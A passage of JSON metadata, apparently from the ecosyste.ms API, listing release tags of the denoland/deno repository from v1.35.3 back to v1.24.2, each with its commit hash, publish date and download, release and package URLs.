ull,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/